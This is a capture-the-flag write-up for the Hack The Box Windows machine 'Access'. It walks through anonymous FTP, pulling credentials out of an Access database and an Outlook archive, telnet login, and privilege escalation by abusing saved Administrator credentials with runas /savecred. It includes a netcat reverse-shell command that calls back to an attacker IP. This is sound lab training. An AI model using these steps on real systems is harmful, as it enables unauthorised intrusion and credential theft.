HTB | Access

This is a Windows box. You can find it here.

Skill Learned

• Enumeration of Access Databases and Outlook Personal Archives

• Identification of saved credentials

NMAP

IP: 10.10.10.98

rustscan

nmap scan

FTP

anonymous logn was allowed

ftp 10.10.10.98

Got backup.mdb

before downloading the file set FTP to binary

binary 
get backup.mdb

get backup.mdb

Got Access Control.zip

Get Access Control.zip

unzip command fails,

let's try 7z Now it is asking for a password

unzip Access\ Control.zip

7x x Access\ Control.zip

We have a backup.mdb file, The file is a Microsoft Access Database:

file backup.mdb

Now to open the file I will use mdbtools 'apt install mdbtools'

mdb-tables

We found alot of tables

mdb-tables backup.zip

We will use

mdb-tables backup.mdb | grep --color=auto user

to see the tables for the user, we found auth_user

mdb-export backup.mdb auth_user

we have admin: admin engineer:access4u@security

Now we can try unzipping the "Access Control".zip "access4u@security" works

Now we have an Outlook folder

Foothold/ shell

I am using this for viewing the file online.

Boom we have a password for the security account

Since the telnet was open

telnet

boom we are in

Found user.txt

user.txt

Priv Esc

On runnng cmdkey /list

cmdkey /list

We found Administrator cred stored on the system

We can use this to copy the root.txt

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > 
C:\Users\security\root.txt"

and boom we have root.txt

We can also have an administrator shell by using nc.exe After transferring the nc.exe we have to

On our system nc -nlvp 1234

on box

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c C:\Users\security\nc.exe -e C:\Windows\System32\cmd.exe 10.10.14.6 1234"

root.txt